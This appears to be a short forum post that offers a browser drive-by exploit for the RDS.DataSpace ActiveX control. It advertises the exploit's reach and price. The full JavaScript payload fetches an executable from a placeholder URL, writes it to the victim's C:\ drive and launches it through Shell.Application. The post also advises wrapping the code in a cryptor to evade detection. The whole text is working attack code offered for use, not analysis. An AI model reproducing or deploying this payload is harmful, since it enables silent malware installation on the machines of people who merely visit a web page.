Код:
This is an Rds.Dataspace exploit .
It is trully it , more than 10% on Europe traffic .
It is coded by Russian guy named HailCaeser at WHB , the cost of it 400$ .
Use htmlzip cryptor , do not use it as the source .
<script>
var obj_RDS = document.createElement('object');
obj_RDS.setAttribute('id','obj_RDS');
obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var is__obj_adodb = 0;
try
{
var obj_adodb = obj_RDS.CreateObject("adodb.stream","");
is__obj_adodb = 1;
}
catch(e){}
if (is__obj_adodb != 1)
{
try
{
var obj_adodb = new ActiveXObject("adodb.stream");
is__obj_adodb = 1;
}
catch(e){}
}
if (is__obj_adodb == 1)
{
try
{
var obj_ShellApp = obj_RDS.CreateObject("Shell.Application","");
var obj_msxml2 = new ActiveXObject("msxml2.XMLHTTP");
obj_msxml2.open("GET","http://YOURFILE.EXE",false);
obj_msxml2.send();
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\36110103225.exe";
obj_adodb.SaveToFile(fn,2);
obj_adodb.close();
obj_ShellApp.ShellExecute(fn);
}
catch(e){}
}
</script>